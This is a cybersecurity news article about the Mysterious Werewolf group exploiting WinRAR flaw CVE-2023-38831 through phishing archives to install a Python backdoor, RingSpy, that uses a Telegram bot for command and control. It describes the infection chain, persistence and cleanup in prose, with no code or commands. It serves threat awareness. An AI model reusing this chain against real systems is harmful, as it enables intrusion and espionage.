Werewolf Hackers Exploiting WinRAR Vulnerability To Deploy RingSpy Backdoor

Active since 2023, the Mysterious Werewolf cluster has shifted targets to the military-industrial complex (MIC) by using phishing emails with a weaponized archive. 

The archive contains a seemingly legitimate PDF document along with a malicious CMD file, and when the victim opens the archive and double-clicks the PDF, the CMD file executes, deploying the RingSpy backdoor onto the compromised system. 

Malware replaces the Athena agent of the Mythic framework, a strategy that Mysterious Werewolf previously employed in earlier campaigns. 

An attacker known as Mysterious Werewolf is employing phishing emails laced with malicious archives that exploit the CVE-2023-38831 vulnerability in WinRAR to execute code.

Document
Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Tactics have shifted, with the Athena agent being swapped for the RingSpy backdoor written in Python, where the group utilizes legitimate services to maintain control of compromised systems, using a Telegram bot as a command and control server.  

A malicious archive exploited a vulnerability in WinRAR (CVE-2023-38831) to launch a VBScript, downloading a malicious batch file (.vbs and 1.bat) by retrieving a download link from Yandex.

Downloading the file using the received link

Disk resource using a cURL command with OAuth credentials and then downloaded another batch file (i.bat) using the retrieved link, and after downloading the script, deleted the link file and executed the downloaded batch file through another VBScript call. 

Both the initial script (1.bat) and the downloaded script (i.bat) self-deleted after execution. The script first checks for an existing file to prevent re-installation and then retrieves a download link, downloads a decoy PDF, opens it, and deletes the link.

Distracting document

Next, it downloads the Python installer from the official website based on a predefined version, extracts it to a hidden local folder, and sets a configuration file to specify search paths for Python modules. 

Then it downloads the pip installer within the Python folder, uses pip to install additional libraries (requests and schedules), and cleans up by deleting the temporary installer script. 

Downloading the Python interpreter

An attacker is deploying a RingSpy backdoor using the Yandex Cloud API and a Python script, which is downloaded and executed through a VBScript file (.vbs) placed in the startup folder and the localAppData folder. 

The backdoor allows remote command execution, downloads files, and sends results to a Telegram bot through a control server. The script can also be scheduled to run every minute using PowerShell.

The downloaded files are saved in a specific folder, and network requests are made to the Telegram bot’s API to send data.  

Obtaining and running the pip installer

According to Bi.zone, the attacker likely gained initial access by sending a spearphishing email with an attachment. Once in, they used PowerShell, command prompts, VBScript, and Python to execute malicious code. 

They potentially exploited a WinRAR vulnerability (CVE-2023-38831) for further execution. To maintain persistence, they used scheduled tasks and startup folders. 

The attacker also attempted to evade defenses by deleting files and used techniques like file transfer and a Telegram bot for command and control.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

Tushar Subhra

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Recent Posts

Google Announces Vanir, A Open-Source Security Patch Validation Tool

Google has officially launched Vanir, an open-source security patch validation tool designed to streamline and automate…

14 hours ago

New Transaction-Relay Jamming Vulnerability Let Attackers Exploits Bitcoin Nodes

A newly disclosed transaction-relay jamming vulnerability has raised concerns about the security of Bitcoin nodes,…

15 hours ago

Raspberry Pi 500 & Monitor, Complete Desktop Setup at $190

Raspberry Pi, a pioneer in affordable and programmable computing, has once again elevated its game…

15 hours ago

Qlik Sense for Windows Vulnerability Allows Remote Code Execution

Qlik has identified critical vulnerabilities in its Qlik Sense Enterprise for Windows software that could…

17 hours ago

QNAP High Severity Vulnerabilities Let Remote attackers to Compromise System

QNAP Systems, Inc. has identified multiple high-severity vulnerabilities in its operating systems, potentially allowing attackers…

19 hours ago

Healthcare Security Strategies for 2025

Imagine this: It's a typical Tuesday morning in a bustling hospital. Doctors make their rounds,…

20 hours ago